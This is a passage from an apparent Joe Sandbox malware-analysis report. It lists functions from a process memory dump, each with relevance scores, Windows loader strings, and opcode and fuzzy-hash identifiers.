                                                      • SXS: %s() bad parameters:SXS: Map : 0x%pSXS: EntryCount : 0x%lx, xrefs: 05882A95
                                                      • RtlpInitializeAssemblyStorageMap, xrefs: 05882A90
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.1557586144.00000000057E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 057E0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_57e0000_vbc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: RtlpInitializeAssemblyStorageMap$SXS: %s() bad parameters:SXS: Map : 0x%pSXS: EntryCount : 0x%lx
                                                      • API String ID: 0-2653619699
                                                      • Opcode ID: b2a1218a55de919794d9b431bff5a3ce7f945a25cde31389f9dbf103d9be8aa5
                                                      • Instruction ID: c7190ce397b0630f5ea60472f461c73ca48b08e754810b75079c6a6e22f7df82
                                                      • Opcode Fuzzy Hash: b2a1218a55de919794d9b431bff5a3ce7f945a25cde31389f9dbf103d9be8aa5
                                                      • Instruction Fuzzy Hash: 09114075704208BBE735DA4C8D41FBF76A9EF94B54F1480697E05DB240D674CD409790
                                                      Function 0584A5D0 Relevance: 2.5, Strings: 2, Instructions: 38COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.1557586144.00000000057E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 057E0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_57e0000_vbc.jbxd
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID: Cleanup Group$Threadpool!
                                                      • API String ID: 2994545307-4008356553
                                                      • Opcode ID: 822be262cee95d517cbbe188c8ce1477b2cab70a39591b9dec65e73c80bf9489
                                                      • Instruction ID: 2bdc5247aa69bda0d83af38a42ebbbced714dba23bd8b47f51e4d938e45b347b
                                                      • Opcode Fuzzy Hash: 822be262cee95d517cbbe188c8ce1477b2cab70a39591b9dec65e73c80bf9489
                                                      • Instruction Fuzzy Hash: 1901D1B2294708AFD311DF14CD4AB2677E9EB44B19F018939B948CB190E774D804DF4A
                                                      Function 0581C7C0 Relevance: 2.2, Strings: 1, Instructions: 960COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.1557586144.00000000057E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 057E0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_57e0000_vbc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: MUI
                                                      • API String ID: 0-1339004836
                                                      • Opcode ID: 848cf6a9fd7ce4bd42b1726b72f2ac3284c7710568138357e35b413cea0ab81c
                                                      • Instruction ID: e8e8fa1d0227742a56b4e273bdefceffd1ab4501d67964fc532991b01fb418b7
                                                      • Opcode Fuzzy Hash: 848cf6a9fd7ce4bd42b1726b72f2ac3284c7710568138357e35b413cea0ab81c
                                                      • Instruction Fuzzy Hash: C9826A75E052188FDB24CFA9C984BADB7BABF48314F148169DC5AEB250D730AD81CF58
                                                      Function 0584F603 Relevance: 1.6, APIs: 1, Instructions: 121COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.1557586144.00000000057E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 057E0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_57e0000_vbc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 45be3dc639eaaeff8eb59c7950c7811248bab46be8a66331260280943167490b
                                                      • Instruction ID: 00d703e785ee3b29914567272b7ce236125f36f59024fbd28de77be59e138827
                                                      • Opcode Fuzzy Hash: 45be3dc639eaaeff8eb59c7950c7811248bab46be8a66331260280943167490b
                                                      • Instruction Fuzzy Hash: 00411AB4D05288AFDB20CFA9C881AAEBBF4FB49340F50456EED59E7251DB359940CF60
                                                      Function 0584A660 Relevance: 1.4, Strings: 1, Instructions: 200COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.1557586144.00000000057E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 057E0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_57e0000_vbc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: GlobalTags
                                                      • API String ID: 0-1106856819
                                                      • Opcode ID: 5c2b5674e8179d0e65932f32be5e33bf795270074d1fde30b8c0c2fdc4f3be44
                                                      • Instruction ID: bde7d764cd5b9d60db60731dfca9967833eed6365bfb4b036ff5a3f4b53a907b
                                                      • Opcode Fuzzy Hash: 5c2b5674e8179d0e65932f32be5e33bf795270074d1fde30b8c0c2fdc4f3be44
                                                      • Instruction Fuzzy Hash: 77714C75E0421A9FDB28EF99D591ABDBBB2FF58704F14812AE806EB240E7709D41CB50
                                                      Function 0581973A Relevance: 1.4, Strings: 1, Instructions: 191COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.1557586144.00000000057E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 057E0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_57e0000_vbc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: @
                                                      • API String ID: 0-2766056989
                                                      • Opcode ID: 32fdc9af89b0788a3bba97dbd317d7b10cd0208f20562fc1281393ba3f626ce3
                                                      • Instruction ID: a2e82e8e01bf0dae5029bfed7033216dadba83b52378afee369ed999791b79aa
                                                      • Opcode Fuzzy Hash: 32fdc9af89b0788a3bba97dbd317d7b10cd0208f20562fc1281393ba3f626ce3
                                                      • Instruction Fuzzy Hash: AE616875D0021DABDB21DFA9C855BAEBBB9FF84724F140129EC12E7290DB359E00CB65
                                                      Function 0589F7AF Relevance: 1.4, Strings: 1, Instructions: 161COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.1557586144.00000000057E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 057E0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_57e0000_vbc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: @
                                                      • API String ID: 0-2766056989
                                                      • Opcode ID: 8281e956446473216ed512d18dfae26456dfb93296f0f4edbd2d8efa18977056
                                                      • Instruction ID: 559d1ca4e46d9c27e4ee578fbde30e9d97a9a5269f259d9dee499e0b7691ab33
                                                      • Opcode Fuzzy Hash: 8281e956446473216ed512d18dfae26456dfb93296f0f4edbd2d8efa18977056
                                                      • Instruction Fuzzy Hash: 65518E72604305AFDB2ADF18C845F6AB7E8FB84754F040929BE45D7290E774ED44CB92
                                                      Function 0582E627 Relevance: 1.4, Strings: 1, Instructions: 148COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.1557586144.00000000057E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 057E0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_57e0000_vbc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: EXT-
                                                      • API String ID: 0-1948896318
                                                      • Opcode ID: a097525ee87cb84a3312906b1c110a91e702c6323f39bfaf5c42f5dc53e103c7
                                                      • Instruction ID: 3ff267b1d65fad4e34c187c4d9cf7ff7f3ecc43e1a282b943a33381d00ffa4a8
                                                      • Opcode Fuzzy Hash: a097525ee87cb84a3312906b1c110a91e702c6323f39bfaf5c42f5dc53e103c7
                                                      • Instruction Fuzzy Hash: 50417D72609321AFD721DA688884B7BBBECAF88614F44092DBD85D7180E674DD84C79B
                                                      Function 0588C730 Relevance: 1.4, Strings: 1, Instructions: 129COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.1557586144.00000000057E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 057E0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_57e0000_vbc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: BinaryHash
                                                      • API String ID: 0-2202222882
                                                      • Opcode ID: 1bd1f142daf2769c1b18209a8a24ac32b0cf0e322e6acdb0d79eea73c4e76049
                                                      • Instruction ID: df24701e1a9ff1d47b6301a785e3dfe3ab09c8e2f531eedaf27a14099aeff9e6
                                                      • Opcode Fuzzy Hash: 1bd1f142daf2769c1b18209a8a24ac32b0cf0e322e6acdb0d79eea73c4e76049
                                                      • Instruction Fuzzy Hash: 7C4144B1D4022CAADF21EB54CC85FAEB77CEB44714F0045A5EE09EB144DB309E898FA5
                                                      Function 058997A9 Relevance: 1.4, Strings: 1, Instructions: 121COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.1557586144.00000000057E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 057E0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_57e0000_vbc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: verifier.dll
                                                      • API String ID: 0-3265496382
                                                      • Opcode ID: 1c4010d13388be5263d35e27490c4b58c62b54ee51730fadae6b5174b71cc093
                                                      • Instruction ID: 895102a2be0f4f6c059fb4faa4ffa076780e1225499973b99dee3843e8a9a5ea
                                                      • Opcode Fuzzy Hash: 1c4010d13388be5263d35e27490c4b58c62b54ee51730fadae6b5174b71cc093
                                                      • Instruction Fuzzy Hash: D7318171714301AFDF289E289852B7677E5FB48710F99943DED49EF680EA318C818B90
                                                      Function 058B705E Relevance: 1.4, Strings: 1, Instructions: 112COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.1557586144.00000000057E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 057E0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_57e0000_vbc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: kLsE
                                                      • API String ID: 0-3058123920
                                                      • Opcode ID: 24e9216d2bc6d5cc1adef6fe31f029f0e60a0e4d9f33a78740a308f23ffb2992
                                                      • Instruction ID: 6d3b1519dbd716857c5aa4cc3fef66a3391d714abd11ef17df909b254fc5bfff
                                                      • Opcode Fuzzy Hash: 24e9216d2bc6d5cc1adef6fe31f029f0e60a0e4d9f33a78740a308f23ffb2992
                                                      • Instruction Fuzzy Hash: 934128716293514EFB21AB68D84ABA93FD8FB80754F141919FD51CB2C1CFB44C86C7A2
                                                      Function 05847505 Relevance: 1.4, Strings: 1, Instructions: 111COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.1557586144.00000000057E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 057E0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_57e0000_vbc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: #
                                                      • API String ID: 0-1885708031
                                                      • Opcode ID: 4bc324cfbfa2083798c26090082f3552f5e90ae9522e24348f396a2005f93b47
                                                      • Instruction ID: 4ca2398c603f1cc52af77233786f61745dc96cb72ebca588ea7e8a63a49a8a27
                                                      • Opcode Fuzzy Hash: 4bc324cfbfa2083798c26090082f3552f5e90ae9522e24348f396a2005f93b47
                                                      • Instruction Fuzzy Hash: 91417975A0066AABDF21DF48C490BBEB7B6FB44615F01405AED46EB210DB349D42CBE1
                                                      Function 058436EF Relevance: 1.4, Strings: 1, Instructions: 106COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.1557586144.00000000057E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 057E0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_57e0000_vbc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: Flst
                                                      • API String ID: 0-2374792617
                                                      • Opcode ID: e3b169101bc180a71e02b2f6c9cfbd384a5a3b153f429dd9dd558090f6a44513
                                                      • Instruction ID: 84f2e25d6623bd3c874eb4bda855a4363ce064919327d85dc2f5cb6f29d2c3e7
                                                      • Opcode Fuzzy Hash: e3b169101bc180a71e02b2f6c9cfbd384a5a3b153f429dd9dd558090f6a44513
                                                      • Instruction Fuzzy Hash: 04418AB5205305DFD714CF18C584A26BBE5FB49714F18856EEC9ACB281DB31DD82CB92
                                                      Function 05809730 Relevance: 1.3, Strings: 1, Instructions: 96COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.1557586144.00000000057E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 057E0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_57e0000_vbc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: L4QwL4Qw
                                                      • API String ID: 0-1417497668
                                                      • Opcode ID: 2f2d4918cb210e54759ef2c9a1a467eb51bf30f79de84aecd8c23497c1d50d42
                                                      • Instruction ID: e4809ff71e8d8a3ed5792635f7522c091fa19f8b8160d47fbd60607ea20a5af5
                                                      • Opcode Fuzzy Hash: 2f2d4918cb210e54759ef2c9a1a467eb51bf30f79de84aecd8c23497c1d50d42
                                                      • Instruction Fuzzy Hash: 0721F276A04728AFC3629F18C804B2A7BB5FF84B54F111829ED65DB382DB30EC00CB91
                                                      Function 05815096 Relevance: 1.3, Strings: 1, Instructions: 71COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.1557586144.00000000057E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 057E0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_57e0000_vbc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: Actx
                                                      • API String ID: 0-89312691
                                                      • Opcode ID: ab4e403085b4cb8672d4e88b15f22128e751b7914d813497b79861c3e75023e8
                                                      • Instruction ID: 44cc75d9a646e21ff6bea2a9de53b027215356a5dac879e9f9c25bab4f3445a1
                                                      • Opcode Fuzzy Hash: ab4e403085b4cb8672d4e88b15f22128e751b7914d813497b79861c3e75023e8
                                                      • Instruction Fuzzy Hash: 551196303086068BD725996D8854A76739FFBD5268F35813ADC62CB350E671DC41CF88
                                                      Function 0586739A Relevance: .7, Instructions: 705COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.1557586144.00000000057E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 057E0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_57e0000_vbc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 062b99fe3302076a38ca35ac8d742d054620f309fb9f0aa8dc2dd43ec13d4130
                                                      • Instruction ID: ca74e3e65bcb5d6c14fe14511f0477eb379aaa2f3b11cf1669d8773f5a6a1355
                                                      • Opcode Fuzzy Hash: 062b99fe3302076a38ca35ac8d742d054620f309fb9f0aa8dc2dd43ec13d4130
                                                      • Instruction Fuzzy Hash: 29427B71A0461A8FDB18CF59C494ABEB7B2FF88318B148569D952EB350DB34EC42CBD0
                                                      Function 058BA118 Relevance: .6, Instructions: 591COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.1557586144.00000000057E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 057E0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_57e0000_vbc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: fceae6fd1447756d93720cf92cb59d3e25cf5c3732bacd4c7e7a59c1498ffc9a
                                                      • Instruction ID: 691732e102d8a6b69b8e8a53a8a6067ee76d943b58a4c214b7e6465faf1ef38a
                                                      • Opcode Fuzzy Hash: fceae6fd1447756d93720cf92cb59d3e25cf5c3732bacd4c7e7a59c1498ffc9a
                                                      • Instruction Fuzzy Hash: D322D0702086558BEB28CF29C0947B6B7EABF05304F08845ADC97CB785D7B5ED82CB61
                                                      Function 058D16CC Relevance: .6, Instructions: 571COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.1557586144.00000000057E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 057E0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_57e0000_vbc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 74e2b98c38fc0b85d8ee950d3ae4c08ac997a45867a105ec67bb3a656be175fe
                                                      • Instruction ID: 44e262c8beec3f8b49183739c9e3cb94918e9e6d3f68a3fd566b4a91a9e31c37
                                                      • Opcode Fuzzy Hash: 74e2b98c38fc0b85d8ee950d3ae4c08ac997a45867a105ec67bb3a656be175fe
                                                      • Instruction Fuzzy Hash: 48228C35B042168BDB19CF59C494ABAF7F2BF88214B24856DDC56DB344EB34AD42CBA0
                                                      Function 058165D0 Relevance: .4, Instructions: 383COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.1557586144.00000000057E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 057E0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_57e0000_vbc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 426b2ee0a6abc24700700a3fa039c1828e4a5190d305bb00250da80c022c9bfc
                                                      • Instruction ID: 00843607c7e625601cf361a024cd5f5708f65cd4b3ed1d94ca073285f361742c
                                                      • Opcode Fuzzy Hash: 426b2ee0a6abc24700700a3fa039c1828e4a5190d305bb00250da80c022c9bfc
                                                      • Instruction Fuzzy Hash: 8EE16A71608345CFC714CF29C090A6ABBE5BF89318F058A6DEC96CB651EB31ED05CB96
                                                      Function 05808397 Relevance: .4, Instructions: 380COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.1557586144.00000000057E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 057E0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_57e0000_vbc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: ae7eeb519d27175d8bdaa3b3eb374af3865368789e258582a9c6d6c4a6f3226d
                                                      • Instruction ID: 49c1f9f52374a7ef11ff2c661a466d80dea97b292c05fe83509f25927d5bdac2
                                                      • Opcode Fuzzy Hash: ae7eeb519d27175d8bdaa3b3eb374af3865368789e258582a9c6d6c4a6f3226d
                                                      • Instruction Fuzzy Hash: 1CD1BE71B0070A9BCB54DF68CC95ABAB3A6BF44218F054629ED56DB2C0EB34ED81CF51
                                                      Function 0581D7E0 Relevance: .3, Instructions: 342COMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.1557586144.00000000057E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 057E0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_57e0000_vbc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 95ebb426c32c00ae68775c87c7007a739199abe960f7dc29ab0ba8535dfa8090
                                                      • Instruction ID: b58444f76284cf4ca36ec9c5eb5ecd6268d3bce88f2d74039469f7e6abea7904
                                                      • Opcode Fuzzy Hash: 95ebb426c32c00ae68775c87c7007a739199abe960f7dc29ab0ba8535dfa8090
                                                      • Instruction Fuzzy Hash: E0C1AF71B052199BDF28DF58C841BAAB7BAFF44314F188269DC16EB290D770ED41CB94
                                                      Function 0582F460 Relevance: .3, Instructions: 321COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.1557586144.00000000057E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 057E0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_57e0000_vbc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: a95c64d6609efb6fd104363703c9af719695147685e8b1a07a6f6d4803b33222
                                                      • Instruction ID: 09599871244a221c0a6993a4848771a85f542b9ea1f726d98cd2e4c3d161722b
                                                      • Opcode Fuzzy Hash: a95c64d6609efb6fd104363703c9af719695147685e8b1a07a6f6d4803b33222
                                                      • Instruction Fuzzy Hash: E0C1EF72A042358BCB24CF18C596B797BB2FF44B14F198159EE42DB3A5EB349D90CB90
                                                      Function 05820535 Relevance: .3, Instructions: 300COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.1557586144.00000000057E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 057E0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_57e0000_vbc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: c61ad9210afadd02b75b489723f8fea184d45ce3a0816f7da46b339e1a5f1bc9
                                                      • Instruction ID: 3b30b8f0134bee0e1258755739bfd10f1f8f58c914d7ada35ca186dd3fd14055
                                                      • Opcode Fuzzy Hash: c61ad9210afadd02b75b489723f8fea184d45ce3a0816f7da46b339e1a5f1bc9
                                                      • Instruction Fuzzy Hash: 9FB10131704659EFDB21DBA8C858BBEBBB6AF44200F144199DD52EB291DB30ED81CB91
                                                      Function 058390DB Relevance: .3, Instructions: 287COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.1557586144.00000000057E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 057E0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_57e0000_vbc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 078c87484a80a6a017deb30c69b817cf8e02448615eceecee11924e9922dd5a2
                                                      • Instruction ID: ca773e93e5346f64560280d4f3d5fca4fc15af8b25c1c3d5d02da8641b5a57c7
                                                      • Opcode Fuzzy Hash: 078c87484a80a6a017deb30c69b817cf8e02448615eceecee11924e9922dd5a2
                                                      • Instruction Fuzzy Hash: 07A13971A04619AFEB229F68CC85FAE7BB9AF45750F010054FD01EB2A0DBB5DC518BA1
                                                      Function 058183C0 Relevance: .3, Instructions: 281COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.1557586144.00000000057E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 057E0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_57e0000_vbc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 7b2acd690a9bfa72ae0c82cfd3725ccbba3e790d1ef85c563aa4ccbf860a93ba
                                                      • Instruction ID: 06156a5a850e03f825a58c9aaefb6a309042c517f2038ebfad3f38abc223d38a
                                                      • Opcode Fuzzy Hash: 7b2acd690a9bfa72ae0c82cfd3725ccbba3e790d1ef85c563aa4ccbf860a93ba
                                                      • Instruction Fuzzy Hash: D3C146712083448FD764CF18C499BAAB7E9FF88304F44496DE98AC7690DB74E948CF92
                                                      Function 0580C427 Relevance: .3, Instructions: 280COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.1557586144.00000000057E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 057E0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_57e0000_vbc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: f9d52bbe668824365940404efe2c2eab5260e309ff225cd6916f48897e333e83
                                                      • Instruction ID: 80c88cedf63b8b7e403ac94af37de1f6e7ba2516a0bf23e7bab85b63b15b0cb4
                                                      • Opcode Fuzzy Hash: f9d52bbe668824365940404efe2c2eab5260e309ff225cd6916f48897e333e83
                                                      • Instruction Fuzzy Hash: ECB15E74B042698BDB64DF58CC94BA9F3B6BF44704F0496E9D80AE7290EB30DD85CB21
                                                      Function 0583E5E7 Relevance: .3, Instructions: 278COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.1557586144.00000000057E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 057E0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_57e0000_vbc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: e6d6729f56cbdff91ae572fb4449f23bb68b0ea17d33f097548e432287ab3e40
                                                      • Instruction ID: a33b1ba22dc4cd8457e97caa21039770ff1d49183c57c8b3dcf07fd0f596d3be
                                                      • Opcode Fuzzy Hash: e6d6729f56cbdff91ae572fb4449f23bb68b0ea17d33f097548e432287ab3e40
                                                      • Instruction Fuzzy Hash: B4A10371E0462C9FEF21DB99C849FAEBBA9BB40754F050121EE11EB290DB789D40CBD1
                                                      Function 05850185 Relevance: .3, Instructions: 276COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.1557586144.00000000057E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 057E0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_57e0000_vbc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: d244123f30f243535289e09fcfcd64994efd68212c59b93a93650ad078853667
                                                      • Instruction ID: 5093b1d43cabc32d6f093c30fbb7328bac98a3102bae11595dc7355ee40116c0
                                                      • Opcode Fuzzy Hash: d244123f30f243535289e09fcfcd64994efd68212c59b93a93650ad078853667
                                                      • Instruction Fuzzy Hash: 43A1B170B0071ADBDB25DF69C995BBAB7A6FF44328F144029EE46D7281DB34AC01CB51
                                                      Function 058E4500 Relevance: .3, Instructions: 275COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.1557586144.00000000057E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 057E0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_57e0000_vbc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 4dcae4d3d321868a96cebaba86b622425e23f853ed78db33effe121526fe9196
                                                      • Instruction ID: b79b9dfa929ab490641eadec44b5d12c8fbe9c61ef5d040ae876abe00b4b9164
                                                      • Opcode Fuzzy Hash: 4dcae4d3d321868a96cebaba86b622425e23f853ed78db33effe121526fe9196
                                                      • Instruction Fuzzy Hash: F9A1CF72A14621AFCB11DF18C981B2ABBF9FF4A714F410928F949DB260D734ED41CB92
                                                      Function 05819486 Relevance: .3, Instructions: 259COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.1557586144.00000000057E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 057E0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_57e0000_vbc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 643e5c09a9e72ad4c69a5a03c05e0293cd3698421c6faa6b59f7aeb0f2e46bfa
                                                      • Instruction ID: 00b7163cf2b2414eb91fddfb54ebb5fa3561c5cfc2cf535ddd44d2549d9b4025
                                                      • Opcode Fuzzy Hash: 643e5c09a9e72ad4c69a5a03c05e0293cd3698421c6faa6b59f7aeb0f2e46bfa
                                                      • Instruction Fuzzy Hash: 06B15B74A04205CFCF24CF19D491BA9BBB9BF48358F144599EE26EB291DB31DC82CB94
                                                      Function 05811131 Relevance: .3, Instructions: 259COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.1557586144.00000000057E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 057E0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_57e0000_vbc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 4c68ed5d138873548d350d7b2dc558346baf99c4b0d65e32ef7e26d7689acd12
                                                      • Instruction ID: 9ad0b849150d858b0766d07d56f17d0e3e00753e6982f84dd6d9bfad57609d1f
                                                      • Opcode Fuzzy Hash: 4c68ed5d138873548d350d7b2dc558346baf99c4b0d65e32ef7e26d7689acd12
                                                      • Instruction Fuzzy Hash: BCB101756093408FD354CF28C584A6AFBE1BF88704F18496EF99ADB352D731E945CB42
                                                      Function 058CB52F Relevance: .2, Instructions: 222COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
